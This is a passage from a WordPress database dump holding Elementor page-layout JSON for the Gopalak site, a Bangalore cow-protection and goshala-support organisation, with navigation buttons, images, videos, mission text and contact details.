background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9615,1617,'_elementor_page_assets','a:0:{}'),(9617,1618,'_elementor_edit_mode','builder'),(9618,1618,'_elementor_template_type','wp-page'),(9619,1618,'_elementor_version','3.7.8'),(9620,1618,'_wp_page_template','elementor_canvas'),(9621,1618,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9622,1618,'_elementor_page_assets','a:0:{}'),(9624,1619,'_elementor_edit_mode','builder'),(9625,1619,'_elementor_template_type','wp-page'),(9626,1619,'_elementor_version','3.7.8'),(9627,1619,'_wp_page_template','elementor_canvas'),(9628,1619,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"